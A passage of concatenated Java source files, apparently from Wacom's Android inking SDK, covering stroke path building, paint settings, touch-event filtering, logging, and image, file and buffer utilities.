SpeedPathBuilder extends PathBuilder{ /** * Constructs a new instance. * @param density Specify density value used in normalization config. */ public SpeedPathBuilder(float density) { super(density); } private native long nativeInitialize(float density); private native void nativeBeginPath(long handle, float x, float y, double timestamp); private native void nativeAddPoint(long handle, float x, float y, double timestamp); private native void nativeEndPath(long handle, float x, float y, double timestamp); /** * Starts building a path from velocity based input. Normally this method is called on a touch down event. * The method calculates a path part (a set of path control points) from the provided input. * The returned path part can be modified by clients before adding it to the currently built path with the {@link #addPathPart(FloatBuffer, int)} method (for example the part could be first smoothened). * @param x The x coordinate of the user's input in the desired path's coordinate system. * @param y The y coordinate of the user's input in the desired path's coordinate system. * @param timestamp The timestamp of the user's input in seconds with double precision. It is used for the velocity calculation. * @return A part of a path (a set of control points) as a float buffer. */ public FloatBuffer beginPath(float x, float y, double timestamp) { beginPath(); nativeBeginPath(handle, x, y, timestamp); return getPathPartBuffer(); } /** * Continues the path generation from velocity based input. Normally this method is called on a touch move event. * The method calculates a path part (a set of path control points) from the provided input. * The returned path part can be modified by clients before adding it to the currently built path with the {@link #addPathPart(FloatBuffer, int)} method (for example the part could be first smoothened). * @param x The x coordinate of the user's input in the desired path's coordinate system. * @param y The y coordinate of the user's input in the desired path's coordinate system. * @param timestamp The timestamp of the user's input in seconds with double precision. It is used for the velocity calculation. * @return A part of a path (a set of control points) as a float buffer. */ public FloatBuffer addPoint(float x, float y, double timestamp) { nativeAddPoint(handle, x, y, timestamp); return getPathPartBuffer(); } /** * Ends the path generation from velocity based input. Normally this method is called on a touch up event. * The method calculates a path part (a set of path control points) from the provided input. * The returned path part can be modified by clients before adding it to the currently built path with the {@link #addPathPart(FloatBuffer, int)} method (for example the part could be first smoothened). * @param x The x coordinate of the user's input in the desired path's coordinate system. * @param y The y coordinate of the user's input in the desired path's coordinate system. * @param timestamp The timestamp of the user's input in seconds with double precision. It is used for the velocity calculation. * @return A part of a path (a set of control points) as a float buffer. */ public FloatBuffer endPath(float x, float y, double timestamp) { nativeEndPath(handle, x, y, timestamp); return getPathPartBuffer(); } @Override protected long initialize(float density) { return nativeInitialize(density); } @Override /** * Sets the min and max velocities that will be used for clamping the input values. * @param minValue The minimum velocity. * @param maxValue The maximum velocity. */ public void setNormalizationConfig(float minValue, float maxValue) { nativeSetNormalizationConfig(handle, density*minValue, density*maxValue); } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.rasterization; import android.graphics.Color; import com.wacom.ink.utils.Utils; /** * The StrokePaint class holds the {@link StrokeBrush}, color, width and cap beginning/ending information about how to draw strokes. * Stroke paint instances are being passed to the {@link InkCanvas#drawStroke(StrokePaint, StrokeJoin, java.nio.FloatBuffer, int, int, int, float, float)} method. */ public class StrokePaint { /** * @hide */ public long handle; private StrokeBrush strokeBrush; private float a,r,g,b; private boolean bRoundCapBeginning; private boolean bRoundCapEnding; private float width; private int color; private native long nativeInitialize(); private native void nativeFinalize(long handle); public StrokePaint(){ this(null); } /** * Creates and initializes an instance with the specified brush. * * @param strokeBrush The brush can be solid color or particle brush. */ public StrokePaint(StrokeBrush strokeBrush){ a = 0.0f; r = 0.0f; g = 0.0f; b = 0.0f; width = Float.NaN; handle = nativeInitialize(); setStrokeBrush(strokeBrush); setColor(r, g, b, a); setWidth(width); setRoundCapBeginning(true); setRoundCapEnding(true); } private native void nativeSetStrokeBrush(long handle, long strokeBrushHandle); /** * Sets the brush this paint instance should draw with. * @param strokeBrush The brush can be solid color or particle brush. */ public void setStrokeBrush(StrokeBrush strokeBrush){ this.strokeBrush = strokeBrush; if (strokeBrush!=null){ nativeSetStrokeBrush(handle, strokeBrush.getStrokeBrushHandle()); } } public StrokeBrush getStrokeBrush(){ return strokeBrush; } private native void nativeSetColor(long handle, float r, float g, float b, float a); /** * Sets the color to draw with. * @param r The red component as float from 0 to 1. * @param g The green component as float from 0 to 1. * @param b The blue component as float from 0 to 1. * @param a The alpha component as float from 0 to 1. */ public void setColor(float r, float g, float b, float a){ this.r = r; this.g = g; this.b = b; this.a = a; nativeSetColor(handle, r, g, b, a); updateColor(); } public float getRed(){ return r; } public float getGreen(){ return g; } public float getBlue(){ return b; } public float getAlpha(){ return a; } public boolean isRoundCapBeginning() { return bRoundCapBeginning; } private native void nativeSetRoundCapBeginning(long handle, boolean bRoundCapBeginning); public void setRoundCapBeginning(boolean bRoundCapBeginning) { this.bRoundCapBeginning = bRoundCapBeginning; nativeSetRoundCapBeginning(handle, bRoundCapBeginning); } public boolean isRoundCapEnding() { return bRoundCapEnding; } private native void nativeSetRoundCapEnding(long handle, boolean bRoundCapEnding); public void setRoundCapEnding(boolean bRoundCapEnding) { this.bRoundCapEnding = bRoundCapEnding; nativeSetRoundCapEnding(handle, bRoundCapEnding); } /** * Gets the width of the stroke. * @return The width. */ public float getWidth() { return width; } public void setColor(int color){ setColor(color, 1.0f); } /** * Gets the current color. * @return The color. */ public int getColor(){ return color; } public void setColorRGB(int color){ float colorArray[] = Utils.colorToArray(color); setColorRGB(colorArray[1], colorArray[2], colorArray[3]); } public void setAlpha(int color){ // float colorArr[] = Utils.colorToArray(color); // setAlpha(colorArr[4]); setAlpha(Color.alpha(color)/255.0f); updateColor(); } public void setColor(int color, float overwriteAlpha){ float colorArr[] = Utils.colorToArray(color); setColor(colorArr[1], colorArr[2], colorArr[3], Float.isNaN(overwriteAlpha)?colorArr[0]:overwriteAlpha); } private native void nativeSetWidth(long handle, float width); /** * Set the width of the stroke. * @param width If this parameter is NAN, a variable width path is expected. */ public void setWidth(float width) { nativeSetWidth(handle, width); this.width = width; } private native void nativeSetAlpha(long handle, float a); public void setAlpha(float alpha){ this.a = alpha; nativeSetAlpha(handle, a); } private native void nativeSetColorRGB(long handle, float r, float g, float b); public void setColorRGB(float r, float g, float b){ this.r = r; this.g = g; this.b = b; updateColor(); nativeSetColorRGB(handle, r, g, b); } public void copy(StrokePaint paint){ setColor(paint.r, paint.g, paint.b, paint.a); setWidth(paint.width); setRoundCapBeginning(paint.bRoundCapBeginning); setRoundCapEnding(paint.bRoundCapEnding); setStrokeBrush(paint.strokeBrush); } public void updateColor(){ if (Float.isNaN(a)){ this.color = Color.rgb((int)(r*255.0f), (int)(g*255.0f), (int)(b*255.0f)); } else { this.color = Color.argb((int)(a*255.0f), (int)(r*255.0f), (int)(g*255.0f), (int)(b*255.0f)); } } @Override protected void finalize() throws Throwable { super.finalize(); nativeFinalize(handle); } static { System.loadLibrary("InkingEngine"); } public void setRoundCaps(boolean bRoundCapBeginning, boolean bRoundCapEnding) { setRoundCapBeginning(bRoundCapBeginning); setRoundCapEnding(bRoundCapEnding); } @Override public String toString() { return "strokeBrush: " + strokeBrush + "; a: " + a + ",r: " + r + ",g: " + g + ",b: " + b + "; caps:" + bRoundCapBeginning + "," + bRoundCapEnding + "; width: " + width; } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2013 Wacom. All rights reserved. */ package com.wacom.ink.utils; import android.view.MotionEvent; /** * OpenGl utility class. * */ public class TouchUtils { private final static Logger logger = new Logger(TouchUtils.class, true); public final static float NO_PRESSURE = -1.0f; public final static double NO_TIMESTAMP = -1.0d; private final static float MINIMUM_POINT_DISTANCE = 2f; /** * Constant: Minimum reported pressure by the Android Framework. * <br/>According to Android Docs: "<i>For a touch screen or touch pad, reports the approximate pressure applied to the surface by a finger or other tool. * The value is normalized to a range from 0 (no pressure at all) to 1 (normal pressure), although values higher than 1 may be generated depending on the calibration of the input device.</i>" * <br/>That's why we take 0 for minimum and 1 maximum value. */ public final static float TOUCHINPUT_MIN_PRESSURE = 0.0f; /** * Constant: Maximum reported pressure by the Android Framework. * <br/>According to Android Docs: "<i>For a touch screen or touch pad, reports the approximate pressure applied to the surface by a finger or other tool. * The value is normalized to a range from 0 (no pressure at all) to 1 (normal pressure), although values higher than 1 may be generated depending on the calibration of the input device.</i>" * <br/>That's why we take 0 for minimum and 1 maximum value. */ public final static float TOUCHINPUT_MAX_PRESSURE = 1.0f; /** * Constant: for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event couldn't be interpreted as valid stroke event by the Wacom Ink. */ public final static int STROKE_EVENT_FAIL = -1; /** * Constant for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event should be interpreted as stroke begin event by the Wacom Ink. */ public final static int STROKE_EVENT_BEGIN = 0; /** * Constant for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event should be interpreted as stroke move event by the Wacom Ink. */ public final static int STROKE_EVENT_MOVE = 1; /** * Constant for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event should be interpreted as stroke end event by the Wacom Ink. */ public final static int STROKE_EVENT_END = 2; /** * Constant for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event should be interpreted as stroke end event by the Wacom Ink. * This constant is used when the Android Framework reports a MotionEvent.ACTION_CANCEL event, which should be treated as stroke end event. * Because the current MotionEvent is outside the screen, in this particular scenario the previous touch event's data should be used for the stroke end event ({@link TouchPointID#getOldX()}, {@link TouchPointID#getOldY()}). * */ public final static int STROKE_EVENT_FORCEEND = 3; public static float normalizePressure(float pressure, float srcMinPressure, float srcMaxPressure, float dstMinPressure, float dstMaxPressure, boolean bIsStylusEvent){ if (!bIsStylusEvent){ return NO_PRESSURE; } return Utils.transformValue(Math.min(srcMaxPressure, pressure), srcMinPressure, srcMaxPressure, dstMinPressure, dstMaxPressure); } public static boolean isStylusEvent(MotionEvent event) { return event.getToolType(event.getActionIndex())==MotionEvent.TOOL_TYPE_STYLUS; } /** * Return an Wacom Ink based timestamp for the given MotionEvent. * @param event a MotionEvent object * @return timestamp in seconds */ public static double getTimestamp(MotionEvent event){ double ts = event.getEventTime()/1000.0; return ts; } /** * Returns an Wacom Ink based timestamp from the given timestamp. * @param timestampInMillis timestamp in milliseconds * * @return timestamp in seconds */ public static double getTimestamp(long timestampInMillis){ return timestampInMillis/1000.0; } /** * Object used to keep track of the coordinates, timestamp and the pointerId of an Android MotionEvent object. * <p/> * TouchPointID objects are used to store Android MotionEvent's data, relevant for the Wacom Ink stroke's lifecycle. */ public static class TouchPointID { private float x; private float y; private long timestamp; private float pressure; private int pointerId; private float oldX; private float oldY; private float oldPressure; private long oldTimestamp; public TouchPointID(float x, float y, int pointerId){ oldX = -1; oldY = -1; this.x = x; this.y = y; this.pointerId = pointerId; timestamp = -1; } public TouchPointID() { this(-1, -1, -1); } public float getX() { return x; } public void setX(float x) { oldX = this.x; this.x = x; } public float getY() { return y; } public void setY(float y) { oldY = this.y; this.y = y; } public float getPressure() { return pressure; } public void setPressure(float pressure) { oldPressure = this.pressure; this.pressure = pressure; } public long getTimestamp() { return timestamp; } public void setTimestamp(long timestamp) { oldTimestamp = this.timestamp; this.timestamp = timestamp; } public int getPointerId() { return pointerId; } public void setPointerId(int pointerId) { this.pointerId = pointerId; } public void invalidate(){ pointerId=-1; setX(-1); setY(-1); setTimestamp(-1); setPressure(-1); } public boolean isValidXY(){ return x>=0 && y>=0; } public boolean isValidOldXY(){ return oldX>=0 && oldY>=0; } public float getOldX(){ return oldX; } public float getOldY(){ return oldY; } public long getOldTimestamp(){ return oldTimestamp; } public float getOldPressure(){ return oldPressure; } public boolean isValid(){ return pointerId>=0; } public boolean isInvalid(){ return !isValid(); } public void setData(MotionEvent motionEvent, int pointerIndex){ this.setX(motionEvent.getX(pointerIndex)); this.setY(motionEvent.getY(pointerIndex)); this.setTimestamp(motionEvent.getEventTime()); this.setPressure(motionEvent.getPressure(pointerIndex)); this.setPointerId(motionEvent.getPointerId(pointerIndex)); } public void setData(MotionEvent motionEvent) { setData(motionEvent, motionEvent.getActionIndex()); } } /** * Translates Android Framework MotionEvents into Wacom Ink stroke events, performing basic analysis based on the current MotionEvent and the previously received touch input. * <p/> According to the InkingEngine Core's documentation, a stroke's life cycle starts with a stroke begin event, followed by at least one stroke move event and finishes with a stroke end event. * <p/>In order to ensure the correct Wacom Ink stroke's life cycle, the Android Framework's touch input is being filtered for every dispatched MotionEvent, * the expected stroke's state is being returned and the current touch event's relevant data (x,y coordinates, pressure, action type, etc.) are being stored in a TouchPointID object in order * to be used again as reference during the next call of this method. * @param motionEvent an MotionEvent reported by the Android Framework. * @param touchPointID a TouchPointID object containing relevant data of the previous MotionEvent. * * @return The expected stroke's event. * <p/>Possible values: * <br/>{@link #STROKE_EVENT_BEGIN}, * <br/>{@link #STROKE_EVENT_MOVE}, * <br/>{@link #STROKE_EVENT_END}, * <br/>{@link #STROKE_EVENT_FAIL}, * <br/>{@link #STROKE_EVENT_FORCEEND} */ public static int filterMotionEventForInking(MotionEvent motionEvent, TouchPointID touchPointID){ int activePointerIndex = motionEvent.getActionIndex(); int currentPointerId = motionEvent.getPointerId(activePointerIndex); int failCode = STROKE_EVENT_FAIL; switch (motionEvent.getActionMasked()){ case MotionEvent.ACTION_DOWN: if (touchPointID.isValid()){ throw new RuntimeException("ACTION_DOWN / already inking?"); } else { touchPointID.setData(motionEvent); } if (logger.isEnabled()){ if (Logger.LOG_ENABLED) logger.d("ACTION_DOWN / OK, down"); } return STROKE_EVENT_BEGIN; case MotionEvent.ACTION_POINTER_DOWN: if (touchPointID.isInvalid()){ //no prev point so we can begin, it's ok touchPointID.setData(motionEvent, activePointerIndex); if (Logger.LOG_ENABLED) logger.d("ACTION_POINTER_DOWN / OK, ptr_down: no prev point so we can begin"); return STROKE_EVENT_BEGIN; } else { //prev point available, it can't be, fail! if (Logger.LOG_ENABLED) logger.d("ACTION_POINTER_DOWN / FAIL, ptr_down: prev point available, it can't be"); return failCode; } case MotionEvent.ACTION_MOVE: if (touchPointID.isInvalid()){ if (Logger.LOG_ENABLED) logger.d("ACTION_MOVE / FAIL, move: invalid last point"); return failCode; } int prevPointerIndex = motionEvent.findPointerIndex(touchPointID.getPointerId()); if (prevPointerIndex==-1){ //glitch: prev pointer id disappeared?! it's impossible! fail! throw new RuntimeException("ACTION_MOVE / prev pointer id disappeared?! it's impossible! fail!"); } else if (!hasReallyMoved(motionEvent.getX(prevPointerIndex), motionEvent.getY(prevPointerIndex), touchPointID.getX(), touchPointID.getY())){ //glitch: new move event, but the x,y coordinates are the same as the prev ones, fail! if (Logger.LOG_ENABLED) logger.d("ACTION_MOVE / FAIL, move: new move event, but the x,y coordinates are the same as the prev ones"); return failCode; } else { //use prev. pointer id to take the data, it's ok if (Logger.LOG_ENABLED) logger.d("ACTION_MOVE / OK, move: use prev. pointer id to take the data"); touchPointID.setData(motionEvent, prevPointerIndex); return STROKE_EVENT_MOVE; } case MotionEvent.ACTION_UP: if (touchPointID.isInvalid()){ //glitch: prev point it missing?! it's impossible! fail! if (Logger.LOG_ENABLED) logger.d("ACTION_UP / FAIL, up: prev point it missing?! it's impossible!"); return failCode; } else { //prev point it available, it's ok if (Logger.LOG_ENABLED) logger.d("ACTION_UP / OK, up: prev point is available"); touchPointID.invalidate(); return STROKE_EVENT_END; } case MotionEvent.ACTION_POINTER_UP: if (touchPointID.isInvalid()){ //no prev point, discard point, fail! if (Logger.LOG_ENABLED) logger.d("ACTION_POINTER_UP / FAIL, ptr_up: no prev point, discard point"); return failCode; } if (currentPointerId == touchPointID.getPointerId()){ //prev pointer id is the same, it's ok touchPointID.invalidate(); if (Logger.LOG_ENABLED) logger.d("ACTION_POINTER_UP / OK, ptr_up: prev pointer id is the same"); return STROKE_EVENT_END; } else { //prev pointer id is different, fail! return failCode; } case MotionEvent.ACTION_CANCEL: if (touchPointID.isValid()){ touchPointID.invalidate(); if (Logger.LOG_ENABLED) logger.d("OK, cancel: treat point as up, use prev. x,y"); return STROKE_EVENT_FORCEEND; //Debug: debugHistory.add("13. ACTION_CANCEL lastWritePoint!=null; copy the last point and treat the point as PEN_UP; " + motionEvent); } else { if (Logger.LOG_ENABLED) logger.d("FAIL, cancel: cancel"); return failCode; } } if (Logger.LOG_ENABLED) logger.d("FAIL, unknown: ?"); return failCode; } private static boolean hasReallyMoved(float x, float y, float oldX, float oldY) { double dist = Math.sqrt((oldX-x)*(oldX-x)+(oldY-y)*(oldY-y)); if (dist<MINIMUM_POINT_DISTANCE){ if (Logger.LOG_ENABLED) logger.d("not 'moved': " + dist); return false; } else { return true; } } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2013 Wacom. All rights reserved. */ package com.wacom.ink.utils; import android.util.Log; /** * Logger class for fast logging and debugging. * Setting LOG_ENABLED to true will enable the debug logging for the java classes. * */ public class Logger { public static final boolean LOG_ENABLED = false; private String tag; private boolean bEnabled; public Logger(Class<?> javaClass){ this(javaClass, true); } public Logger(Class<?> javaClass, boolean bEnabled){ this(javaClass.getSimpleName(), bEnabled); } public Logger(String tag, boolean bEnabled){ this.tag = tag; this.bEnabled = bEnabled; } public void d(String message){ if (bEnabled){ Log.d(tag, message); } } public void i(String message) { if (bEnabled){ Log.i(tag, message); } } public void e(String message) { if (bEnabled){ Log.e(tag, message); } } public boolean isEnabled(){ return bEnabled; } public void setEnabled(boolean bEnabled){ this.bEnabled = bEnabled; } }<file_sep>package com.wacom.ink.utils; import java.util.LinkedList; public abstract class ReusablePool<T> { private LinkedList<SharedResource<T>> pool; private int maxsize; public ReusablePool(int maxsize){ this.maxsize = maxsize; } public void getSlot(){ SharedResource<T> res = null; if (pool.size()==maxsize){ for (SharedResource<T> resource: pool){ if (!resource.hasOwner()){ res = resource; break; } } if (res==null){ res = pool.getFirst(); res.release(); } } else { pool.add(createSlot()); } } protected abstract SharedResource<T> createSlot(); } <file_sep>/** * Group of classes designed for implementing Protocol Buffer serialization of WILL file format. */ package com.wacom.ink.serialization; <file_sep>/* * Created by <NAME>. * Copyright (c) 2013 Wacom. All rights reserved. */ package com.wacom.ink.utils; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.nio.ByteBuffer; import java.nio.ByteOrder; import java.nio.FloatBuffer; import java.util.List; import android.app.Activity; import android.content.ContentResolver; import android.content.ContentValues; import android.content.Context; import android.content.Intent; import android.graphics.Bitmap; import android.graphics.Bitmap.CompressFormat; import android.graphics.Color; import android.graphics.Matrix; import android.graphics.Path; import android.graphics.RectF; import android.graphics.Region; import android.net.Uri; import android.os.Debug; import android.provider.MediaStore; import android.util.Log; /** * Utility class. * */ public class Utils{ private final static Logger logger = new Logger(Utils.class, true); public final static String MIME_PNG = "image/png"; public final static String EXT_PNG = "png"; public final static String MIME_JPEG = "image/jpeg"; public final static String EXT_JPG = "jpg"; public final static int COLOR_ARR_ALPHA = 0; public final static int COLOR_ARR_RED = 1; public final static int COLOR_ARR_GREEN = 2; public final static int COLOR_ARR_BLUE = 3; public static InputStream openFile(Context context, String filename, String location) throws IOException{ if (location==null){ return context.getAssets().open(filename); } else { return new FileInputStream(new File(location, filename)); } } public static float[] colorToArray(int color){ return colorToArray(color, -1); } public static float mulIfTrue(float value, float mul, boolean bCondition){ if (bCondition){ return value*mul; } else { return value; } } public static Bitmap cropAndScaleBitmapAtCenterPt(Bitmap bitmap, int width, int height){ int x, y; double sw = bitmap.getWidth(); double sh = bitmap.getHeight(); double tw = width; double th = height; double tr = th/tw; double sr = sh/sw; double cropW = 0; double cropH = 0; if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / src: " + sw + "," + sh); if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / target: " + tw + "," + th); if (tr>sr){ cropW = sh*(1.0/tr); cropH = sh; if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / crop width => sr=" + sr + " tr=" + tr); } else { cropW = sw; cropH = sw*tr; if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / crop height => sr=" + sr + " tr=" + tr); } x = (int) Math.round((sw-cropW)/2); y = (int) Math.round((sh-cropH)/2); float scaleFactor = (float) (tw/cropW); Matrix m = new Matrix(); m.setScale(scaleFactor, scaleFactor); bitmap = Bitmap.createBitmap(bitmap, x, y, (int)Math.round(cropW), (int)Math.round(cropH), m, true); if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / crop | x,y,w,h => " + x + ", " + y + ", " + (int)Math.round(cropW) + ", " + (int)Math.round(cropH)); if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / scale | scaleFactor=" + scaleFactor + " => " + (int)Math.round(cropW*scaleFactor) + ", " + (int)Math.round(cropH*scaleFactor)); return bitmap; } public static float[] colorToArray(int color, float overwriteAlpha){ float[] array = new float[4]; array[0] = (overwriteAlpha>=0)?overwriteAlpha:Color.alpha(color)/255.0f; array[1] = Color.red(color)/255.0f; array[2] = Color.green(color)/255.0f; array[3] = Color.blue(color)/255.0f; return array; } public static void alertAndAssert(String assertMessage) { if (Logger.LOG_ENABLED) logger.e(assertMessage); throw new RuntimeException("ASSERT: " + assertMessage); } public static Uri insertInMediaStore(ContentResolver contentResolver, File filePath, String imageType){ Uri uri = null; ContentValues values = new ContentValues(2); values.put(MediaStore.Images.Media.MIME_TYPE, imageType); values.put(MediaStore.Images.Media.DATA, filePath.getAbsolutePath()); uri = contentResolver.insert( MediaStore.Images.Media.EXTERNAL_CONTENT_URI, values); return uri; } public static void startIntentChooseFile(Activity activity, String mime, int requestCode, String chooserTitle){ Intent intent = new Intent(Intent.ACTION_GET_CONTENT); intent.setType(mime); activity.startActivityForResult(intent, requestCode); } public static void startIntentSendFile(Context context, String chooserTitle, Uri uri, String mime, String altText){ Intent intent = new Intent(Intent.ACTION_SEND); intent.putExtra(Intent.EXTRA_STREAM, uri); intent.setType(mime); if (altText!=null){ intent.putExtra(Intent.EXTRA_TEXT, altText); intent.putExtra(Intent.EXTRA_SUBJECT, altText); } context.startActivity(Intent.createChooser(intent, chooserTitle)); } public static void startIntentViewFile(Context context, Uri uri, String mime){ Intent intent = new Intent(Intent.ACTION_VIEW); intent.setDataAndType(uri, mime); context.startActivity(intent); } public static boolean saveJPEG(Bitmap bitmap, String fname){ return saveImage(bitmap, fname, CompressFormat.JPEG, 100); } public static boolean saveJPEG(Bitmap bitmap, String fname, int quality){ return saveImage(bitmap, fname, CompressFormat.JPEG, quality); } public static boolean savePNG(Bitmap bitmap, String fname){ return saveImage(bitmap, fname, CompressFormat.PNG, 0); } public static boolean saveImage(Bitmap bitmap, String fname, Bitmap.CompressFormat fileFormat, int quality){ FileOutputStream output = null; boolean bSuccess = false; try { output = new FileOutputStream(new File(fname)); bitmap.compress(fileFormat, quality, output); output.close(); bSuccess = true; } catch (FileNotFoundException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } finally { if (!bSuccess){ try{ output.close(); } catch (Exception ex){ } } } return bSuccess; } public static float transformValue(float value, float minValue, float maxValue, float dstMinValue, float dstMaxValue){ if (minValue>=maxValue){ Utils.alertAndAssert("transformValue / minValue exceeds maxValue"); } if (dstMinValue>=dstMaxValue){ Utils.alertAndAssert("transformValue / dstMinValue exceeds dstMaxValue"); } if (value<minValue || value>maxValue){ Utils.alertAndAssert("transformValue / value outside required range."); } float res = dstMinValue + (value-minValue)*(dstMaxValue-dstMinValue)/(maxValue-minValue); return res; } public static class TickTock{ private long tickTs; private long tockTs; private float tps; private long count; private long index; private long totalTime; private String logString; public TickTock(String logString, int count){ this.count = count; this.logString = logString; } public void tick(){ tickTs = System.currentTimeMillis(); } public void tock(){ if (tickTs==0){ return; } tockTs = System.currentTimeMillis(); index++; if (tickTs>0){ totalTime += tockTs-tickTs; } if (index==count){ tps = (1000.0f / ((float)totalTime/(float)count)); if (Logger.LOG_ENABLED) logger.d(logString + " tps: " + tps + " avg: " + ((float)totalTime/count)); reset(); } } public void reset(){ index = 0; tps = 0; tockTs = 0; tickTs = 0; totalTime = 0; } } public static void printMemoryInfo(String tag){ if (Logger.LOG_ENABLED){ logger.i(tag + " nativeHeapSize: " + Debug.getNativeHeapSize()/1024.0f + " kb."); logger.i(tag + " nativeHeapAllocatedSize: " + Debug.getNativeHeapAllocatedSize()/1024.0f + " kb."); logger.i(tag + " nativeHeapFreeSize: " + Debug.getNativeHeapFreeSize()/1024.0f + " kb."); logger.i(tag + " freeMemory: " + Runtime.getRuntime().freeMemory()/1024.0f + " kb."); logger.i(tag + " totalMemory: " + Runtime.getRuntime().totalMemory()/1024.0f + " kb."); logger.i(tag + " maxMemory: " + Runtime.getRuntime().maxMemory()/1024.0f + " kb."); logger.i(tag + " availableProcessors: " + Runtime.getRuntime().availableProcessors()); } } public static float getNonNan(float v, float alt){ if (Float.isNaN(v)){ return alt; } else { return v; } } public static boolean isPointInsideClosedPath(Path path, float x, float y){ return isPointInsideClosedPath(path, (int)x, (int)y); } public static boolean isPointInsideClosedPath(Path path, int x, int y){ RectF rectF = new RectF(); path.computeBounds(rectF, true); Region region = new Region(); region.setPath(path, new Region((int) rectF.left, (int) rectF.top, (int) rectF.right, (int) rectF.bottom)); //logger.e("isPointInsideClosedPath: " + region.contains(x, y) + "/" + x + "," + y + " / " + rectF.toShortString() + " / " + region.toString()); return region.contains(x, y); } public static String[] splitFilenameAndExt(String filename){ int dotPos = filename.lastIndexOf("."); if (dotPos>-1 && dotPos<filename.length()-1){ String res[] = new String[2]; res[0] = filename.substring(0, dotPos); res[1] = filename.substring(dotPos+1); return res; } else { return null; } } public static Bitmap recycleBitmap(Bitmap bitmap){ if (bitmap!=null){ if (!bitmap.isRecycled()){ bitmap.recycle(); } bitmap = null; } return null; } public static String getTrimmedNonNullStr(String string) { return string==null?"":string.trim(); } public static File copyFile(Uri uri, String destination){ return copyFile(uri, destination, null); } public static File copyFile(Uri uri, String destination, String saveAsFilename){ File destinationFile = new File(destination); File sourceFile = new File(uri.getPath()); if (!sourceFile.isFile() && !sourceFile.exists()){ return null; } if (saveAsFilename!=null && destinationFile.isDirectory()){ destinationFile = new File(destination, saveAsFilename); } else if (destinationFile.isDirectory()){ destinationFile = new File(destination, sourceFile.getName()); } else if (destinationFile.isFile() && destinationFile.exists()){ destinationFile.delete(); } else { return null; } InputStream in = null; OutputStream out = null; boolean bSuccess = true; try { in = new FileInputStream(sourceFile); out = new FileOutputStream(destinationFile); byte[] buf = new byte[128*1024]; int len; while ((len = in.read(buf)) > 0) { out.write(buf, 0, len); } in.close(); out.close(); } catch (FileNotFoundException e) { e.printStackTrace(); bSuccess = false; } catch (IOException e) { e.printStackTrace(); bSuccess = false; } finally { try { in.close(); } catch (Exception e) { e.printStackTrace(); } try { out.close(); } catch (Exception e) { e.printStackTrace(); } in = null; out = null; } return bSuccess?destinationFile:null; } public static FloatBuffer createNativeFloatBuffer(FloatBuffer source, int sourcePosition, int size){ FloatBuffer buffer = createNativeFloatBuffer(size); copyFloatBuffer(source, buffer, sourcePosition, 0, size); return buffer; } public static FloatBuffer createNativeFloatBuffer(int initialCount){ return ByteBuffer.allocateDirect(initialCount*Float.SIZE/Byte.SIZE).order(ByteOrder.nativeOrder()).asFloatBuffer(); } public static FloatBuffer createNativeFloatBufferBySize(int size){ return ByteBuffer.allocateDirect(size*Float.SIZE/Byte.SIZE).order(ByteOrder.nativeOrder()).asFloatBuffer(); } public static FloatBuffer reallocNativeFloatBuffer(FloatBuffer buffer, int capacity){ if (buffer==null || capacity>buffer.capacity()){ buffer = createNativeFloatBuffer(capacity); } return buffer; } public static void assertBufferCapacity(ByteBuffer buffer, int capacity){ if (buffer==null || capacity>buffer.capacity()){ alertAndAssert("Buffer too small."); } } public static ByteBuffer createNativeByteBuffer(int initialCount){ return ByteBuffer.allocateDirect(initialCount).order(ByteOrder.nativeOrder()); } public static ByteBuffer createNativeByteBuffer(byte[] bytes){ ByteBuffer buffer = createNativeByteBuffer(bytes.length); buffer.position(0); buffer.put(bytes); return buffer; } public static ByteBuffer createNativeByteBuffer(byte[] bytes, int offset, int bytesCount){ ByteBuffer buffer = createNativeByteBuffer(bytesCount); buffer.position(0); buffer.put(bytes, offset, bytesCount); buffer.position(0); return buffer; } public static ByteBuffer reallocNativeByteBuffer(ByteBuffer buffer, int capacity){ if (buffer==null || capacity>buffer.capacity()){ if (Logger.LOG_ENABLED) logger.i("reallocNativeByteBuffer: " + buffer + " / current capacity=" + (buffer!=null?buffer.capacity():0) + "; requested capacity=" + capacity); buffer = createNativeByteBuffer(capacity); } return buffer; } public static void dumpBuffer(String msg, ByteBuffer buffer, int pos, int size, int stride){ if (!Logger.LOG_ENABLED || !logger.isEnabled()){ return; } int cnt=0; String line; logger.e("Dumping buffer[I] [" + msg + "]; size=" + size + ", stride=" + stride + ", limit=" + buffer.limit() + " / " + pos + "," + size); buffer.position(pos); for (int i=0;i<=(size/stride)-1;i++){ cnt++; line = ""; for (int s=0;s<stride;s++){ line += (line.length()!=0?", ":" ") + buffer.get(); } logger.e("BUFFER_DUMP[I] [" + msg + "] [" + cnt + "]" + line); } } public static void checkChangedBuffer(String msg, ByteBuffer buffer, int pos, int size){ if (!Logger.LOG_ENABLED || !logger.isEnabled()){ return; } int bChangedElements = 0; buffer.position(pos); for (int i=0;i<=size-1;i++){ if (buffer.get()!=0){ bChangedElements++; } } logger.e("checkChangedBuffer: " + bChangedElements + " of " + size); } public static void dumpBuffer(String msg, FloatBuffer buffer, int pos, int size, int stride){ if (!Logger.LOG_ENABLED || !logger.isEnabled()){ return; } int cnt=0; String line; logger.e("BUFFER_DUMP Dumping buffer[F] [" + msg + "]; size=" + size + ", stride=" + stride + ", limit=" + buffer.limit() + " / " + pos + "," + size); buffer.position(pos); for (int i=0;i<=(size/stride)-1;i++){ cnt++; line = ""; for (int s=0;s<stride;s++){ line += (line.length()!=0?", ":" ") + buffer.get(); } logger.e("BUFFER_DUMP [" + msg + "] [" + 